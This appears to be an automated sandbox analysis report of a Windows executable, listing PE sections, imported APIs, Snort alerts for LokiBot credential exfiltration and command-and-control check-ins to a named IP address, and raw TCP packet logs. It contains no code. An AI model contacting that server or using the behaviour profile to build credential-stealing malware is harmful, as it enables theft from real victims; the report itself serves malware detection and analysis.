                    .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountry
                    RT_ICON0x2c1900x2e8dataEnglishUnited States
                    RT_DIALOG0x2c4780x100dataEnglishUnited States
                    RT_DIALOG0x2c5780x11cdataEnglishUnited States
                    RT_DIALOG0x2c6980x60dataEnglishUnited States
                    RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                    RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                    Imports

                    DLLImport
                    KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                    USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                    SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                    ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    01/14/22-09:24:21.210022TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974380192.168.2.3104.223.93.105
                    01/14/22-09:24:21.210022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.3104.223.93.105
                    01/14/22-09:24:21.210022TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.3104.223.93.105
                    01/14/22-09:24:22.998234TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974480192.168.2.3104.223.93.105
                    01/14/22-09:24:22.998234TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3104.223.93.105
                    01/14/22-09:24:22.998234TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3104.223.93.105
                    01/14/22-09:24:24.618610TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.3104.223.93.105
                    01/14/22-09:24:24.618610TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3104.223.93.105
                    01/14/22-09:24:24.618610TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3104.223.93.105
                    01/14/22-09:24:26.009494TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3104.223.93.105
                    01/14/22-09:24:26.009494TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3104.223.93.105
                    01/14/22-09:24:26.009494TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3104.223.93.105
                    01/14/22-09:24:27.434582TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.3104.223.93.105
                    01/14/22-09:24:27.434582TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.3104.223.93.105
                    01/14/22-09:24:27.434582TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.3104.223.93.105
                    01/14/22-09:24:29.242787TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.3104.223.93.105
                    01/14/22-09:24:29.242787TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.3104.223.93.105
                    01/14/22-09:24:29.242787TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.3104.223.93.105
                    01/14/22-09:24:31.358483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3104.223.93.105
                    01/14/22-09:24:31.358483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3104.223.93.105
                    01/14/22-09:24:31.358483TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3104.223.93.105
                    01/14/22-09:24:32.843753TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.3104.223.93.105
                    01/14/22-09:24:32.843753TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3104.223.93.105
                    01/14/22-09:24:32.843753TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.3104.223.93.105
                    01/14/22-09:24:34.253886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.3104.223.93.105
                    01/14/22-09:24:34.253886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.3104.223.93.105
                    01/14/22-09:24:34.253886TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.3104.223.93.105
                    01/14/22-09:24:35.721894TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.3104.223.93.105
                    01/14/22-09:24:35.721894TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.3104.223.93.105
                    01/14/22-09:24:35.721894TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.3104.223.93.105
                    01/14/22-09:24:37.035382TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.3104.223.93.105
                    01/14/22-09:24:37.035382TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.3104.223.93.105
                    01/14/22-09:24:37.035382TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.3104.223.93.105
                    01/14/22-09:24:38.459969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975480192.168.2.3104.223.93.105
                    01/14/22-09:24:38.459969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.3104.223.93.105
                    01/14/22-09:24:38.459969TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.3104.223.93.105
                    01/14/22-09:24:41.014483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.3104.223.93.105
                    01/14/22-09:24:41.014483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.3104.223.93.105
                    01/14/22-09:24:41.014483TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.3104.223.93.105
                    01/14/22-09:24:43.765625TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.3104.223.93.105
                    01/14/22-09:24:43.765625TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.3104.223.93.105
                    01/14/22-09:24:43.765625TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.3104.223.93.105
                    01/14/22-09:24:46.465908TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.3104.223.93.105
                    01/14/22-09:24:46.465908TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.3104.223.93.105
                    01/14/22-09:24:46.465908TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.3104.223.93.105
                    01/14/22-09:24:49.164147TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.3104.223.93.105
                    01/14/22-09:24:49.164147TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.3104.223.93.105
                    01/14/22-09:24:49.164147TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.3104.223.93.105
                    01/14/22-09:24:50.858342TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.3104.223.93.105
                    01/14/22-09:24:50.858342TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.3104.223.93.105
                    01/14/22-09:24:50.858342TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.3104.223.93.105
                    01/14/22-09:24:53.504302TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.3104.223.93.105
                    01/14/22-09:24:53.504302TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.3104.223.93.105
                    01/14/22-09:24:53.504302TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.3104.223.93.105
                    01/14/22-09:24:54.799106TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.3104.223.93.105
                    01/14/22-09:24:54.799106TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.3104.223.93.105
                    01/14/22-09:24:54.799106TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.3104.223.93.105
                    01/14/22-09:24:56.589624TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.3104.223.93.105
                    01/14/22-09:24:56.589624TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.3104.223.93.105
                    01/14/22-09:24:56.589624TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.3104.223.93.105
                    01/14/22-09:24:58.517149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.3104.223.93.105
                    01/14/22-09:24:58.517149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.3104.223.93.105
                    01/14/22-09:24:58.517149TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.3104.223.93.105
                    01/14/22-09:25:00.494413TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.3104.223.93.105
                    01/14/22-09:25:00.494413TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.3104.223.93.105
                    01/14/22-09:25:00.494413TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.3104.223.93.105
                    01/14/22-09:25:02.175264TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976780192.168.2.3104.223.93.105
                    01/14/22-09:25:02.175264TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.3104.223.93.105
                    01/14/22-09:25:02.175264TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.3104.223.93.105
                    01/14/22-09:25:04.821827TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.3104.223.93.105
                    01/14/22-09:25:04.821827TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.3104.223.93.105
                    01/14/22-09:25:04.821827TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.3104.223.93.105
                    01/14/22-09:25:07.361011TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.3104.223.93.105
                    01/14/22-09:25:07.361011TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.3104.223.93.105
                    01/14/22-09:25:07.361011TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.3104.223.93.105
                    01/14/22-09:25:08.948329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.3104.223.93.105
                    01/14/22-09:25:08.948329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.3104.223.93.105
                    01/14/22-09:25:08.948329TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.3104.223.93.105
                    01/14/22-09:25:10.960978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.3104.223.93.105
                    01/14/22-09:25:10.960978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.3104.223.93.105
                    01/14/22-09:25:10.960978TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.3104.223.93.105
                    01/14/22-09:25:12.466061TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.3104.223.93.105
                    01/14/22-09:25:12.466061TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.3104.223.93.105
                    01/14/22-09:25:12.466061TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.3104.223.93.105
                    01/14/22-09:25:13.878222TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.3104.223.93.105
                    01/14/22-09:25:13.878222TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.3104.223.93.105
                    01/14/22-09:25:13.878222TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.3104.223.93.105
                    01/14/22-09:25:17.178733TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.3104.223.93.105
                    01/14/22-09:25:17.178733TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.3104.223.93.105
                    01/14/22-09:25:17.178733TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.3104.223.93.105
                    01/14/22-09:25:20.254047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.3104.223.93.105
                    01/14/22-09:25:20.254047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.3104.223.93.105
                    01/14/22-09:25:20.254047TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.3104.223.93.105
                    01/14/22-09:25:24.894113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.3104.223.93.105
                    01/14/22-09:25:24.894113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.3104.223.93.105
                    01/14/22-09:25:24.894113TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.3104.223.93.105
                    01/14/22-09:25:27.413146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.3104.223.93.105
                    01/14/22-09:25:27.413146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.3104.223.93.105
                    01/14/22-09:25:27.413146TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.3104.223.93.105
                    01/14/22-09:25:32.783225TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.3104.223.93.105
                    01/14/22-09:25:32.783225TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.3104.223.93.105
                    01/14/22-09:25:32.783225TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.3104.223.93.105
                    01/14/22-09:25:35.615470TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.3104.223.93.105
                    01/14/22-09:25:35.615470TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.3104.223.93.105
                    01/14/22-09:25:35.615470TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.3104.223.93.105
                    01/14/22-09:25:37.954643TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.3104.223.93.105
                    01/14/22-09:25:37.954643TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.3104.223.93.105
                    01/14/22-09:25:37.954643TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.3104.223.93.105
                    01/14/22-09:25:40.432496TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.3104.223.93.105
                    01/14/22-09:25:40.432496TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.3104.223.93.105
                    01/14/22-09:25:40.432496TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.3104.223.93.105
                    01/14/22-09:25:43.095141TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.2.3104.223.93.105
                    01/14/22-09:25:43.095141TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.2.3104.223.93.105
                    01/14/22-09:25:43.095141TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.3104.223.93.105
                    01/14/22-09:25:44.516568TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.3104.223.93.105
                    01/14/22-09:25:44.516568TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.3104.223.93.105
                    01/14/22-09:25:44.516568TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.3104.223.93.105
                    01/14/22-09:25:45.910085TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.3104.223.93.105
                    01/14/22-09:25:45.910085TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.3104.223.93.105
                    01/14/22-09:25:45.910085TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.3104.223.93.105
                    01/14/22-09:25:47.885917TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.3104.223.93.105
                    01/14/22-09:25:47.885917TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.3104.223.93.105
                    01/14/22-09:25:47.885917TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.3104.223.93.105
                    01/14/22-09:25:50.027789TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.2.3104.223.93.105
                    01/14/22-09:25:50.027789TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.2.3104.223.93.105
                    01/14/22-09:25:50.027789TCP2025381ET TROJAN LokiBot Checkin4984980192.168.2.3104.223.93.105
                    01/14/22-09:25:53.334039TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.3104.223.93.105
                    01/14/22-09:25:53.334039TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.3104.223.93.105
                    01/14/22-09:25:53.334039TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.3104.223.93.105
                    01/14/22-09:25:55.488936TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.3104.223.93.105
                    01/14/22-09:25:55.488936TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.3104.223.93.105
                    01/14/22-09:25:55.488936TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.3104.223.93.105
                    01/14/22-09:25:58.848829TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.3104.223.93.105
                    01/14/22-09:25:58.848829TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.3104.223.93.105
                    01/14/22-09:25:58.848829TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.3104.223.93.105
                    01/14/22-09:26:01.825690TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.3104.223.93.105
                    01/14/22-09:26:01.825690TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.3104.223.93.105
                    01/14/22-09:26:01.825690TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.3104.223.93.105
                    01/14/22-09:26:03.549433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.3104.223.93.105
                    01/14/22-09:26:03.549433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.3104.223.93.105
                    01/14/22-09:26:03.549433TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.3104.223.93.105
                    01/14/22-09:26:05.020305TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3104.223.93.105
                    01/14/22-09:26:05.020305TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.3104.223.93.105
                    01/14/22-09:26:05.020305TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.3104.223.93.105
                    01/14/22-09:26:06.500274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.3104.223.93.105
                    01/14/22-09:26:06.500274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.3104.223.93.105
                    01/14/22-09:26:06.500274TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.3104.223.93.105
                    01/14/22-09:26:07.901534TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.3104.223.93.105
                    01/14/22-09:26:07.901534TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.3104.223.93.105
                    01/14/22-09:26:07.901534TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.3104.223.93.105
                    01/14/22-09:26:09.260757TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3104.223.93.105
                    01/14/22-09:26:09.260757TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3104.223.93.105
                    01/14/22-09:26:09.260757TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3104.223.93.105
                    01/14/22-09:26:10.842581TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.3104.223.93.105
                    01/14/22-09:26:10.842581TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.3104.223.93.105
                    01/14/22-09:26:10.842581TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.3104.223.93.105
                    01/14/22-09:26:12.247628TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.3104.223.93.105
                    01/14/22-09:26:12.247628TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.3104.223.93.105
                    01/14/22-09:26:12.247628TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.3104.223.93.105
                    01/14/22-09:26:13.817317TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.3104.223.93.105
                    01/14/22-09:26:13.817317TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.3104.223.93.105
                    01/14/22-09:26:13.817317TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.3104.223.93.105
                    01/14/22-09:26:15.234068TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.3104.223.93.105
                    01/14/22-09:26:15.234068TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.3104.223.93.105
                    01/14/22-09:26:15.234068TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.3104.223.93.105
                    01/14/22-09:26:16.746339TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.3104.223.93.105
                    01/14/22-09:26:16.746339TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.3104.223.93.105
                    01/14/22-09:26:16.746339TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.3104.223.93.105

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2022 09:24:21.054052114 CET4974380192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:21.207153082 CET8049743104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:21.207262993 CET4974380192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:21.210021973 CET4974380192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:21.332510948 CET8049743104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:21.332616091 CET4974380192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:21.455492973 CET8049743104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:21.478250980 CET8049743104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:21.478285074 CET8049743104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:21.478480101 CET4974380192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:21.478532076 CET4974380192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:21.601222038 CET8049743104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:22.870625973 CET4974480192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:22.994765043 CET8049744104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:22.994929075 CET4974480192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:22.998234034 CET4974480192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:23.122327089 CET8049744104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:23.122443914 CET4974480192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:23.246737957 CET8049744104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:23.255940914 CET8049744104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:23.255974054 CET8049744104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:23.256108046 CET4974480192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:23.256242037 CET4974480192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:23.381480932 CET8049744104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:24.492712021 CET4974580192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:24.615272999 CET8049745104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:24.615441084 CET4974580192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:24.618609905 CET4974580192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:24.743750095 CET8049745104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:24.744019032 CET4974580192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:24.867125034 CET8049745104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:24.875466108 CET8049745104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:24.875560999 CET8049745104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:24.875665903 CET4974580192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:24.875752926 CET4974580192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:24.999078989 CET8049745104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:25.878114939 CET4974680192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:26.005634069 CET8049746104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:26.005755901 CET4974680192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:26.009494066 CET4974680192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:26.133670092 CET8049746104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:26.133810043 CET4974680192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:26.297760010 CET8049746104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:26.305594921 CET8049746104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:26.305648088 CET8049746104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:26.305731058 CET4974680192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:26.305815935 CET4974680192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:26.431415081 CET8049746104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:27.290039062 CET4974780192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:27.414261103 CET8049747104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:27.414413929 CET4974780192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:27.434581995 CET4974780192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:27.558733940 CET8049747104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:27.558836937 CET4974780192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:27.683128119 CET8049747104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:27.691371918 CET8049747104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:27.691415071 CET8049747104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:27.691529989 CET4974780192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:27.799938917 CET4974780192.168.2.3104.223.93.105
                    Jan 14, 2022 09:24:27.924349070 CET8049747104.223.93.105192.168.2.3
                    Jan 14, 2022 09:24:29.116728067 CET4974880192.168.2.3104.223.93.105
